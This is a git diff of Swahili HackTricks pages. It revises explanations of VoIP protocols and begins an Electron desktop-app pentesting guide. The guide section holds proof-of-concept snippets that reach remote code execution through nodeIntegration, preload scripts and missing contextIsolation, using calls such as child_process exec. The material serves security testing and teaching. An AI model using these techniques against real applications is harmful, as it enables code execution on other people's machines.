kazi na kuhakikisha kuwa habari ya kudhibiti wito inawasilishwa ipasavyo kati ya mitandao tofauti. +1. **Mnadaaji wa Simu au Msimamizi wa Geti la Vyombo vya Habari (MGC)**: Geti kuu katika muundo wa MGCP ni jukumu la **kusimamia na kudhibiti geti la vyombo vya habari**. Inashughulikia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu. MGC inawasiliana na geti la vyombo vya habari kwa kutumia itifaki ya MGCP. +2. **Vyombo vya Habari (MGs) au Geti la Mtumwa**: Vifaa hivi **vinabadilisha mitiririko ya vyombo vya habari vya dijiti kati ya mitandao tofauti**, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinasimamiwa na MGC na kutekeleza amri zinazopokelewa kutoka kwake. Vyombo vya habari vinaweza kuwa na kazi kama vile kubadilisha namna ya sauti, kufungasha pakiti, na kufuta sauti. +3. **Geti za Kutia Saini (SGs)**: Geti hizi zinahusika na **kubadilisha ujumbe wa kutia saini kati ya mitandao tofauti**, kuruhusu mawasiliano laini kati ya mifumo ya simu za jadi (k.m., SS7) na mitandao inayotumia IP (k.m., SIP au H.323). Geti za kutia saini ni muhimu kwa uratibu na kuhakikisha kuwa habari ya kudhibiti simu inasambazwa ipasavyo kati ya mitandao tofauti. -Kwa muhtasari, MGCP inaunganisha mantiki ya kudhibiti wito katika wakala wa wito, ambayo inasaidia usimamizi wa malango ya vyombo vya habari na ishara, ikitoa uwezo bora wa kupanuka, kuaminika, na ufanisi katika mitandao ya mawasiliano. +Kwa muhtasari, MGCP inajikita katika mantiki ya kudhibiti simu katika mnadaaji wa simu, ambayo inasaidia usimamizi rahisi wa vyombo vya habari na geti za kutia saini, ikitoa uwezo bora wa kupanuka, uaminifu, na ufanisi katika mitandao ya mawasiliano. -### SCCP (Itifaki ya Udhibiti wa Mteja Mdogo) +### SCCP (Itifaki ya Kudhibiti Mteja Mdogo) -Itifaki ya Udhibiti wa Mteja Mdogo (SCCP) ni **itifaki ya ishara na kudhibiti wito** ya kipekee ya Cisco Systems. Inatumika hasa kwa mawasiliano kati ya **Meneja wa Mawasiliano wa Cisco Unified** (inayojulikana hapo awali kama CallManager) na simu za IP za Cisco au vifaa vingine vya sauti na video vya Cisco. +Itifaki ya Kudhibiti Mteja Mdogo (SCCP) ni **itifaki ya kutia saini na kudhibiti simu** inayomilikiwa na Cisco Systems. Inatumiwa hasa kwa mawasiliano kati ya **Meneja wa Mawasiliano wa Cisco** (inayojulikana hapo awali kama CallManager) na simu za IP za Cisco au vifaa vingine vya sauti na video vya Cisco. -SCCP ni itifaki nyepesi ambayo inasaidia mawasiliano kati ya seva ya kudhibiti wito na vifaa vya mwisho. Inaitwa "Skinny" kwa sababu ya muundo wake mdogo na mahitaji ya kubana kwa upana wa bandari ikilinganishwa na itifaki zingine za VoIP kama H.323 au SIP. +SCCP ni itifaki nyepesi inayosimplisha mawasiliano kati ya seva ya kudhibiti simu na vifaa vya mwisho. Inaitwa "Skinny" kwa sababu ya muundo wake wa kimsingi na mahitaji madogo ya upana wa bandari ikilinganishwa na itifaki zingine za VoIP kama H.323 au SIP. -Sehemu kuu za mfumo uliojengwa kwa kutumia SCCP ni: +Sehemu kuu za mfumo wa SCCP ni: -1. **Seva ya Kudhibiti Wito**: Seva hii, kawaida Meneja wa Mawasiliano wa Cisco Unified, inasimamia mchakato wa kuanzisha, kubadilisha, na kumaliza wito, pamoja na huduma zingine za simu kama kupeleka wito, kuhamisha wito, na kushikilia wito. -2. **Vifaa vya SCCP**: Hivi ni vifaa kama simu za IP, vitengo vya mkutano wa video, au vifaa vingine vya sauti na video vya Cisco ambavyo hutumia SCCP kwa mawasiliano na seva ya kudhibiti wito. Vinaandikishwa na seva, hupokea na kutuma ujumbe wa ishara, na kufuata maagizo yaliyotolewa na seva ya kudhibiti wito kwa kushughulikia wito. -3. **Malango**: Vifaa hivi, kama malango ya sauti au malango ya vyombo vya habari, wanawajibika kwa kubadilisha mito ya vyombo vya habari kati ya mitandao tofauti, kama simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyobadilishwa kwa pakiti. Pia wanaweza kuwa na kazi zaidi kama vile kubadilisha muundo au kufuta sauti. +1. **Seva ya Kudhibiti Simu**: Seva hii, kawaida Meneja wa Mawasiliano wa Cisco, inasimamia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu, pamoja na huduma zingine za simu kama vile kupeleka simu, kuhamisha simu, na kushikilia simu. +2. **Vifaa vya Mwisho vya SCCP**: Hivi ni vifaa kama simu za IP, vitengo vya mkutano wa video, au vifaa vingine vya sauti na video vya Cisco vinavyotumia SCCP kwa mawasiliano na seva ya kudhibiti simu. Vinajiandikisha kwa seva, kutuma na kupokea ujumbe wa kutia saini, na kufuata maagizo yanayotolewa na seva ya kudhibiti simu kwa usimamizi wa simu. +3. **Geti**: Vifaa hivi, kama vile geti za sauti au vyombo vya habari, wanahusika na kubadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinaweza pia kuwa na kazi zaidi, kama vile kubadilisha namna ya sauti au kufuta sauti. -SCCP inatoa njia rahisi na ufanisi ya mawasiliano kati ya seva za kudhibiti wito za Cisco na vifaa vya mwisho. Walakini, ni muhimu kutambua kuwa **SCCP ni itifaki ya kipekee**, ambayo inaweza kuzuia uwezo wa kufanya kazi pamoja na mifumo au vifaa visivyo vya Cisco. Katika kesi kama hizo, itifaki zingine za kawaida za VoIP kama SIP zinaweza kuwa chaguo bora. +SCCP inatoa njia rahisi na ufanisi wa mawasiliano kati ya seva za kudhibiti simu za Cisco na vifaa vya mwisho. Walakini, ni muhimu kutambua kwamba **SCCP ni itifaki ya kipekee**, ambayo inaweza kuzuia uratibu na mifumo au vifaa visivyo vya Cisco. Katika kesi kama hizo, itifaki zingine za VoIP za viwango kama SIP zinaweza kuwa chaguo bora zaidi. ### H.323 -H.323 ni **mkusanyiko wa itifaki** za mawasiliano ya multimedia, ikiwa ni pamoja na sauti, video, na mikutano ya data juu ya mitandao iliyobadilishwa kwa pakiti, kama vile mitandao ya IP. Iliendelezwa na **Shirika la Mawasiliano la Kimataifa** (ITU-T) na hutoa mfumo kamili wa kusimamia vikao vya mawasiliano ya multimedia. +H.323 ni **mkusanyo wa itifaki** za mawasiliano ya multimedia, ikiwa ni pamoja na sauti, video, na mikutano ya data juu ya mitandao iliyosongwa kwa pakiti, kama vile mitandao inayotumia IP. Iliundwa na **Shirika la Kimataifa la Mawasiliano** (ITU-T) na hutoa mfumo kamili wa kusimamia vikao vya mawasiliano ya multimedia. -Baadhi ya sehemu muhimu za mkusanyiko wa H.323 ni pamoja na: +Baadhi ya sehemu muhimu za mkusanyo wa H.323 ni pamoja na: -1. **Vifaa vya Mwisho**: Hivi ni vifaa vya mwisho, kama simu za IP, mifumo ya mkutano wa video, au programu za programu, ambazo zinasaidia H.323 na zinaweza kushiriki katika vikao vya m -## Itifaki za Uhamishaji na Usafirishaji +1. **Vifaa vya Mwisho**: Hivi ni vifaa vya mwisho, kama vile simu za IP, mifumo ya mkutano wa video, au programu za programu, ambazo zinasaidia H.323 na zinaweza kushiriki katika vikao vya mawasiliano ya multimedia. +2. **Geti**: Vifaa hivi vinabadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti, kuruhusu uratibu kati ya H.323 na mifumo mingine ya mawasiliano. Vinaweza pia kuwa na kazi zaidi, kama vile kubadilisha namna ya sauti au kufuta sauti. +3. **Walinzi wa Geti**: Hizi ni sehemu za hiari zinazotoa huduma za kudhibiti simu na usimamizi katika mtandao wa H.323. Hufanya kazi kama vile tafsiri ya anwani, usimamizi wa upana wa bandari, na kudhibiti idhini, kusaidia katika usimamizi na optimization ya rasilimali za mtandao. +4. **Vifaa vya Udhibiti wa Multipoint (MCUs)**: Vifaa hivi huwezesha mikutano ya multipoint kwa kusimamia na kuchanganya mitiririko ya vyombo vya habari kutoka kwa vifaa vingi vya mwisho. MCUs huwezesha huduma kama vile kudhibiti mpangilio wa video, kubadilisha sauti kulingana na sauti, na uwepo endelevu, kuruhusu kuandaa mikutano kubwa na washiriki wengi. + +H.323 inasaidia anuwai ya kodeki za sauti na video, pamoja na huduma zingine za ziada kama vile kupeleka simu, kuhamisha simu, kushikilia simu, na kusubiri simu. Licha ya kupokelewa kwa kiasi kikubwa katika siku za mwanzo za VoIP, H.323 imeanza kubadilishwa polepole na itifaki za kisasa na zenye ufanisi zaidi kama **Itifaki ya Kuanzisha Kikao (SIP)**, ambayo inatoa uratibu bora na utekelezaji rahisi. Walakini, H.323 bado inatumika katika mifumo mingi ya zamani na inaendelea kusaidiwa na wauzaji mbalimbali wa vifaa. + +### IAX (Inter Asterisk eXchange) + +IAX (Inter-Asterisk eXchange) ni **itifaki ya kutia saini na kudhibiti simu** inayotumiwa hasa kwa mawasiliano kati ya seva za Asterisk PBX (Private Branch Exchange) na vifaa vingine vya VoIP. Iliundwa na Mark Spencer, mwanzilishi wa programu ya Asterisk PBX ya chanzo wazi, kama mbadala kwa itifaki zingine za VoIP kama SIP na H.323. + +IAX inajulikana kwa **urahisi, ufanisi, na urahisi wa utekelezaji**. Baadhi ya sifa muhimu za IAX ni pamoja na: + +1. **Bandari Moja ya UDP**: IAX hutumia bandari moja ya UDP (4569) kwa mawasiliano ya kutia saini na vyombo vya habari, ambayo inasimplisha kupitisha kizuizi cha firewall na NAT, ikifanya iwe rahisi kupeleka katika mazingira mbalimbali ya mtandao. +2. **Itifaki ya Binary**: Tofauti na itifaki zinazotumia maandishi kama SIP, IAX ni itifaki ya binary, ambayo inapunguza matumizi yake ya upana wa bandari na kufanya iwe ufanisi zaidi katika kutuma data ya kutia saini na vyombo vya habari. +3. **Trunking**: IAX inasaidia trunking, ambayo inaruhusu simu nyingi kuunganishwa katika muunganisho mmoja wa mtandao, kupunguza gharama za ziada na kuboresha matumizi ya upana wa bandari. +4. **Ufichaji wa Asili**: IAX ina msaada wa kujengwa kwa ufichaji, ikitumia mbinu kama RSA kwa kubadilishana funguo na AES kwa ufichaji wa vyombo vya habari, kutoa mawasiliano salama kati ya vituo. +5. **Mawasiliano ya Mwenzake kwa Mwenzake**: IAX inaweza kutumika kwa mawasiliano moja kwa moja kati ya vituo bila haja ya seva kuu, ikiruhusu mchakato rahisi na ufanisi zaidi wa kupangilia simu. + +Licha ya faida zake, IAX ina baadhi ya mapungufu, kama vile kuzingatia kuu kwa mazingira ya Asterisk na kupokea kwa kiasi kidogo ikilinganishwa na itifaki zilizothibitishwa zaidi kama SIP. Kama matokeo, IAX huenda sio chaguo bora kwa uratibu na mifumo au vifaa visivyo vya Asterisk. Walakini, kwa wale wanaofanya kazi ndani ya mazingira ya Asterisk, IAX inatoa suluhisho imara na ufanisi kwa mawasiliano ya VoIP. +## Itifaki za Usafirishaji na Usafirishaji ### SDP (Itifaki ya Maelezo ya Kikao) -SDP (Itifaki ya Maelezo ya Kikao) ni **muundo wa maandishi** unaotumika kuelezea sifa za vikao vya multimedia, kama sauti, video, au mikutano ya data, juu ya mtandao wa IP. Iliundwa na **Internet Engineering Task Force (IETF)** na imefafanuliwa katika **RFC 4566**. SDP haishughulikii uhamishaji halisi wa media au kuanzisha kikao, lakini hutumiwa pamoja na itifaki zingine za ishara, kama vile **SIP (Itifaki ya Kuanzisha Kikao)**, kujadiliana na kubadilishana habari kuhusu mitiririko ya media na sifa zake. +SDP (Itifaki ya Maelezo ya Kikao) ni **muundo wa maandishi** unaotumika kuelezea sifa za vikao vya multimedia, kama sauti, video, au mikutano ya data, juu ya mitandao ya IP. Iliundwa na **Internet Engineering Task Force (IETF)** na inafafanuliwa katika **RFC 4566**. SDP haitumii usafirishaji halisi wa media au kuanzisha kikao lakini hutumiwa pamoja na itifaki zingine za ishara, kama **SIP (Itifaki ya Kuanzisha Kikao)**, kujadiliana na kubadilishana habari kuhusu mito ya media na sifa zao. Baadhi ya vipengele muhimu vya SDP ni pamoja na: -1. **Maelezo ya Kikao**: SDP inaelezea maelezo ya kikao cha multimedia, ikiwa ni pamoja na jina la kikao, maelezo ya kikao, wakati wa kuanza, na wakati wa kumaliza. -2. **Mitiririko ya Media**: SDP inafafanua sifa za mitiririko ya media, kama vile aina ya media (sauti, video, au maandishi), itifaki ya usafirishaji (k.m., RTP au SRTP), na muundo wa media (k.m., habari za codec). +1. **Maelezo ya Kikao**: SDP inaelezea maelezo ya kikao cha multimedia, ikiwa ni pamoja na jina la kikao, maelezo ya kikao, wakati wa kuanza, na wakati wa mwisho. +2. **Mito ya Media**: SDP inafafanua sifa za mito ya media, kama aina ya media (sauti, video, au maandishi), itifaki ya usafirishaji (k.m., RTP au SRTP), na muundo wa media (k.m., habari za codec). 3. **Maelezo ya Uunganisho**: SDP hutoa habari kuhusu anwani ya mtandao (anwani ya IP) na nambari ya bandari ambapo media inapaswa kutumwa au kupokelewa. -4. **Sifa**: SDP inasaidia matumizi ya sifa kutoa habari ziada, za hiari kuhusu kikao au mtiririko wa media. Sifa zinaweza kutumika kwa kutoa vipengele mbalimbali kama vile funguo za kusimbwa, mahitaji ya wigo wa bandari, au mifumo ya kudhibiti media. +4. **Vipengele**: SDP inasaidia matumizi ya vipengele kutoa habari ya ziada, hiari kuhusu kikao au mto wa media. Vipengele vinaweza kutumika kwa kufafanua vipengele mbalimbali kama vile funguo za kuchakata, mahitaji ya upana wa bandari, au mbinu za kudhibiti media. SDP kawaida hutumiwa katika mchakato ufuatao: -1. Chama kinachoanzisha kikao hujenga maelezo ya SDP ya kikao cha multimedia kinachopendekezwa, ikiwa ni pamoja na maelezo ya mitiririko ya media na sifa zake. -2. Maelezo ya SDP yanatumwa kwa chama kinachopokea, kawaida yakiwa yamejumuishwa ndani ya ujumbe wa itifaki ya ishara kama vile SIP au RTSP. -3. Chama kinachopokea huprocess maelezo ya SDP, na kulingana na uwezo wake, kinaweza kukubali, kukataa, au kubadilisha kikao kilichopendekezwa. -4. Maelezo ya mwisho ya SDP yanatumwa kwa chama kinachoanzisha kama sehemu ya ujumbe wa itifaki ya ishara, kukamilisha mchakato wa majadiliano. +1. Chama cha kuanzisha hujenga maelezo ya SDP ya kikao cha multimedia kilichopendekezwa, ikiwa ni pamoja na maelezo ya mito ya media na sifa zao. +2. Maelezo ya SDP hutumwa kwa chama cha kupokea, kawaida imejumuishwa ndani ya ujumbe wa itifaki ya ishara kama SIP au RTSP. +3. Chama cha kupokea huprocess maelezo ya SDP, na kulingana na uwezo wake, inaweza kukubali, kukataa, au kurekebisha kikao kilichopendekezwa. +4. Maelezo ya mwisho ya SDP hutumwa kwa chama cha kuanzisha kama sehemu ya ujumbe wa itifaki ya ishara, kukamilisha mchakato wa majadiliano. -Urahisi na uwezo wa kubadilika wa SDP hufanya iwe kiwango kinachokubalika sana kwa kuelezea vikao vya multimedia katika mifumo mbalimbali ya mawasiliano, ikicheza jukumu muhimu katika kuanzisha na kusimamia vikao vya multimedia halisi kwenye mtandao wa IP. +Urahisi na uwezo wa kubadilika wa SDP hufanya iwe kiwango kilichokubaliwa sana kwa kuelezea vikao vya multimedia katika mifumo mbalimbali ya mawasiliano, ikicheza jukumu muhimu katika kuanzisha na kusimamia vikao vya multimedia halisi kwenye mitandao ya IP. ### RTP / RTCP / SRTP / ZRTP -1. **RTP (Itifaki ya Usafirishaji Halisi wa Waktu)**: RTP ni itifaki ya mtandao iliyoundwa kwa utoaji wa data ya sauti na video, au media halisi wakati mwingine, juu ya mtandao wa IP. Iliyoundwa na **IETF** na kufafanuliwa katika **RFC 3550**, RTP mara nyingi hutumiwa na itifaki za ishara kama vile SIP na H.323 kuwezesha mawasiliano ya multimedia. RTP hutoa mbinu za **synchronization**, **sequencing**, na **timestamping** ya mitiririko ya media, ikisaidia kuhakikisha upigaji wa media ulio laini na kwa wakati unaofaa. -2. **RTCP (Itifaki ya Kudhibiti Usafirishaji Halisi wa Waktu)**: RTCP ni itifaki ya rafiki ya RTP, inayotumika kwa kufuatilia ubora wa huduma (QoS) na kutoa maoni kuhusu usafirishaji wa mitiririko ya media. Iliyofafanuliwa katika **RFC 3550** sawa na RTP, RTCP **hutumia pakiti za kudhibiti kubadilishana kwa kipindi kati ya washiriki katika kikao cha RTP**. Inashiriki habari kama vile upotezaji wa pakiti, jitter, na wakati wa raundi, ambayo husaidia katika kutambua na kuzoea hali za mtandao, kuboresha ubora wa jumla wa media. -3. **SRTP (Itifaki ya Usafirishaji Halisi Salama wa Waktu)**: SRTP ni nyongeza ya RTP ambayo hutoa **kusimbwa**, **uthibitishaji wa ujumbe**, na **ulinzi dhidi ya kurudia** kwa mitiririko ya media, ikisimamia usafirishaji salama wa data nyeti ya sauti na video. Iliyofafanuliwa katika **RFC 3711**, SRTP hutumia algorithm za kriptografia kama AES kwa kusimbwa na HMAC-SHA1 kwa uthibitishaji wa ujumbe. SRTP mara nyingi hutumiwa kwa pamoja na itifaki salama za ishara kama vile SIP juu ya TLS kutoa usalama wa mwisho hadi mwisho katika mawasiliano ya multimedia. -4. **ZRTP (Itifaki ya Usafirishaji Halisi wa Waktu ya Zimmermann)**: ZRTP ni itifaki ya makubaliano ya kriptografia ambayo hutoa **kusimbwa mwisho hadi mwisho** kwa mitiririko ya media ya RTP. Iliyoundwa na Phil Zimmermann, muundaji wa PGP, ZRTP inaelezewa katika **RFC 6189**. Tofauti na SRTP, ambayo inategemea itifaki za ishara kwa kubadilishana funguo, ZRTP imeundwa kufanya kazi bila kuhitaji itifaki ya ishara. Inatumia **kubadilishana kwa funguo za Diffie-Hellman** kuweka siri iliyoshirikiwa kati ya vyama vinavyoongea, bila kuhitaji uaminifu wa awali au miundombinu ya ufunguo wa umma (PKI). ZRTP pia inajumuisha vipengele kama **Vidokezo vifupi vya Uthibitishaji (SAS)** kulinda dhidi ya mashambulizi ya mtu katikati. +1. **RTP (Itifaki ya Usafirishaji wa Moja kwa Moja)**: RTP ni itifaki ya mtandao iliyoundwa kwa utoaji wa data ya sauti na video, au media halisi wakati mwingine, juu ya mitandao ya IP. Iliundwa na **IETF** na kufafanuliwa katika **RFC 3550**, RTP mara nyingi hutumiwa na itifaki za ishara kama SIP na H.323 kuwezesha mawasiliano ya multimedia. RTP hutoa mbinu za **synchronization**, **sequencing**, na **timestamping** ya mito ya media, ikisaidia kuhakikisha uchezaji wa media laini na wa wakati unaofaa. +2. **RTCP (Itifaki ya Kudhibiti Usafirishaji wa Moja kwa Moja)**: RTCP ni itifaki mshirika wa RTP, hutumika kwa ufuatiliaji wa ubora wa huduma (QoS) na kutoa maoni kuhusu usafirishaji wa mito ya media. Imefafanuliwa katika **RFC 3550** sawa na RTP, RTCP **hutumia kubadilishana pakiti za kudhibiti kati ya washiriki katika kikao cha RTP**. Inashiriki habari kama upotevu wa pakiti, jitter, na muda wa safari ya pande zote, ambayo husaidia katika kutambua na kuzoea hali za mtandao, kuboresha ubora wa jumla wa media. +3. **SRTP (Itifaki ya Usafirishaji Salama wa Moja kwa Moja)**: SRTP ni upanuzi wa RTP ambao hutoa **encryption**, **uthibitisho wa ujumbe**, na **ulinzi dhidi ya kurudia** kwa mito ya media, ikihakikisha usafirishaji salama wa data nyeti ya sauti na video. Imefafanuliwa katika **RFC 3711**, SRTP hutumia mbinu za kryptografia kama AES kwa encryption na HMAC-SHA1 kwa uthibitisho wa ujumbe. SRTP mara nyingi hutumiwa pamoja na itifaki za ishara salama kama SIP juu ya TLS kutoa usalama mwisho hadi mwisho katika mawasiliano ya multimedia. +4. **ZRTP (Itifaki ya Usafirishaji wa Moja kwa Moja ya Zimmermann)**: ZRTP ni itifaki ya makubaliano ya funguo ya kryptografia ambayo hutoa **encryption mwisho hadi mwisho** kwa mito ya media ya RTP. Iliyoundwa na Phil Zimmermann, mwumbaji wa PGP, ZRTP inaelezwa katika **RFC 6189**. Tofauti na SRTP, ambayo inategemea itifaki za ishara kwa kubadilishana funguo, ZRTP imeundwa kufanya kazi bila kutegemea itifaki ya ishara. Inatumia **Diffie-Hellman key exchange** kuanzisha siri iliyoshirikiwa kati ya vyama vinavyoongea, bila kuhitaji imani ya awali au miundombinu ya funguo ya umma (PKI). ZRTP pia inajumuisha vipengele kama **Short Authentication Strings (SAS)** kulinda dhidi ya mashambulizi ya mtu katikati. -Itifaki hizi zina jukumu muhimu katika **utoaji na usalama wa mawasiliano ya multimedia halisi wakati mwingine juu ya mtandao wa IP**. Wakati RTP na RTCP hushughulikia uhamishaji halisi wa media na ufuatiliaji wa ubora, SRTP na ZRTP huhakikisha kuwa media iliyotumwa inalindwa dhidi ya kusikiliza, kubadilisha, na mashambulizi ya kurudia. +Itifaki hizi zina jukumu muhimu katika **utoaji na kuhakikisha usalama wa mawasiliano ya multimedia halisi kwenye mitandao ya IP**. Wakati RTP na RTCP hushughulikia usafirishaji halisi wa media na ufuatiliaji wa ubora, SRTP na ZRTP huhakikisha kuwa media iliyotumwa inalindwa dhidi ya kusikiliza, kuhariri, na mashambulizi ya kurudia. diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index 32f677913..43a8f5582 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -1,29 +1,43 @@ -# Programu za Kompyuta za Electron +# Programu za Kompyuta za Meza za Electron
-Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJISAJILI**](https://github.com/sponsors/carlospolop)! +* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ## Utangulizi -Electron inachanganya seva ya ndani (na **NodeJS**) na sehemu ya mbele (**Chromium**), ingawa inakosa baadhi ya mifumo ya usalama ya vivinjari vya kisasa. +Electron inachanganya seva ya ndani (na **NodeJS**) na mbele (**Chromium**), ingawa inakosa baadhi ya mifumo ya usalama ya vivinjari vya kisasa. Kawaida unaweza kupata msimbo wa programu ya electron ndani ya programu ya `.asar`, ili kupata msimbo unahitaji kuutoa: ```bash npx asar extract app.asar destfolder #Extract everything npx asar extract-file app.asar main.js #Extract just a file ``` -Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza kupata `main.js` faili ambapo mipangilio ya usalama imewekwa. +Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza kupata `main.js` ambapo mipangilio ya usalama imewekwa. ```json { "name": "standard-notes", @@ -32,11 +46,11 @@ Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza Electron ina aina 2 za michakato: * Michakato ya Kuu (ina ufikivu kamili wa NodeJS) -* Michakato ya Mchoraji (inapaswa kuwa na ufikivu mdogo wa NodeJS kwa sababu za usalama) +* Michakato ya Mwonekano (inapaswa kuwa na ufikivu mdogo wa NodeJS kwa sababu za usalama) ![](<../../../.gitbook/assets/image (179).png>) -Mchakato wa **mchoraji** utakuwa dirisha la kivinjari linalopakia faili: +Mchakato wa **mwonekano** utakuwa dirisha la kivinjari linalopakia faili: ```javascript const {BrowserWindow} = require('electron'); let win = new BrowserWindow(); @@ -44,17 +58,17 @@ let win = new BrowserWindow(); //Open Renderer Process win.loadURL(`file://path/to/index.html`); ``` -Mipangilio ya **mchakato wa renderer** inaweza **kusanidiwa** katika **mchakato wa msingi** ndani ya faili ya main.js. Baadhi ya mipangilio itazuia programu ya Electron kupata RCE au mapungufu mengine ikiwa **mipangilio imewekwa kwa usahihi**. +Mipangilio ya **mchakato wa renderer** inaweza **kusanidiwa** katika **mchakato wa msingi** ndani ya faili ya main.js. Baadhi ya mipangilio itazuia programu ya Electron kupata RCE au vulnerabilities nyingine ikiwa **mipangilio imewekwa kwa usahihi**. Programu ya electron **inaweza kupata kifaa** kupitia apis za Node ingawa inaweza kusanidiwa kuzuia hilo: -* **`nodeIntegration`** - ni `off` kwa chaguo-msingi. Ikiwa ni `on`, inaruhusu kupata vipengele vya node kutoka kwa mchakato wa renderer. +* **`nodeIntegration`** - ni `off` kwa chaguo-msingi. Ikiwa ni `on`, inaruhusu kupata vipengele vya Node kutoka kwa mchakato wa renderer. * **`contextIsolation`** - ni `on` kwa chaguo-msingi. Ikiwa ni `off`, mchakato wa msingi na renderer hawajaachanishwa. * **`preload`** - tupu kwa chaguo-msingi. * [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - ni off kwa chaguo-msingi. Itazuia vitendo ambavyo NodeJS inaweza kutekeleza. * Ushirikiano wa Node katika Wafanyikazi * **`nodeIntegrationInSubframes`** - ni `off` kwa chaguo-msingi. -* Ikiwa **`nodeIntegration`** ime **wezeshwa**, hii itaruhusu matumizi ya **Node.js APIs** kwenye kurasa za wavuti zilizopakiwa kwenye iframes ndani ya programu ya Electron. +* Ikiwa **`nodeIntegration`** ime **wezeshwa**, hii itaruhusu matumizi ya **Node.js APIs** katika kurasa za wavuti ambazo zimeloadiwa kwenye iframes ndani ya programu ya Electron. * Ikiwa **`nodeIntegration`** ime **lemazwa**, basi preloads zitapakia kwenye iframe Mfano wa usanidi: @@ -123,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app'); ## RCE: preload -Skripti iliyoorodheshwa katika mipangilio hii ina**ngia kabla ya skripti nyingine kwenye renderer**, hivyo ina **upatikanaji usio na kikomo wa Node APIs**: +Skripti iliyotajwa katika mazingira haya ina**l**oaded kabla ya skripti zingine kwenye renderer**, hivyo ina **upatikanaji usio na kikomo wa Node APIs**: ```javascript new BrowserWindow{ webPreferences: { @@ -132,7 +146,7 @@ preload: _path2.default.join(__dirname, 'perload.js'), } }); ``` -Kwa hivyo, script inaweza kuuza node-features kwa kurasa: +Kwa hivyo, scripti inaweza kuuza node-features kwa kurasa: {% code title="preload.js" %} ```javascript @@ -160,13 +174,13 @@ runCalc(); ## RCE: XSS + contextIsolation -_**contextIsolation**_ inaleta **muktadha uliogawanyika kati ya skripti za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron** ili utekelezaji wa JavaScript wa kila msimbo usiathiri mwingine. Hii ni sifa muhimu ya kufuta uwezekano wa RCE. +_**contextIsolation**_ inaleta **muktadha uliogawanyika kati ya skripti za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron** ili utekelezaji wa JavaScript wa kila msimbo usiathiri kila mmoja. Hii ni sifa muhimu ya kufuta uwezekano wa RCE. Ikiwa muktadha haujatengwa, mkaidi anaweza: -1. Kutekeleza **JavaScript ya kupindukia kwenye renderer** (XSS au kuhamia kwenye tovuti za nje) -2. **Kubadilisha njia iliyojengwa** ambayo hutumiwa katika upakiaji wa msimbo au msimbo wa ndani wa Electron kwa kazi yake mwenyewe -3. **Kuzindua** matumizi ya **njia iliyobadilishwa** +1. Tekeleza **JavaScript ya kupindukia kwenye mchirizi** (XSS au urambazaji kwenye tovuti za nje) +2. **Kubadilisha njia iliyojengwa** ambayo hutumiwa katika upakiaji wa msimbo au msimbo wa ndani wa Electron kuwa kazi yake mwenyewe +3. **Kuzindua** matumizi ya **kazi iliyobadilishwa** 4. RCE? Kuna sehemu 2 ambapo njia zilizojengwa zinaweza kubadilishwa: Katika msimbo wa upakiaji au katika msimbo wa ndani wa Electron: @@ -193,14 +207,14 @@ window.addEventListener('click', (e) => { Kwa habari zaidi kuhusu mifano hii angalia [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) na [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) -Wakati wa kutekeleza programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya `nodeIntegration` na `contextIsolation` ni muhimu. Imethibitishwa 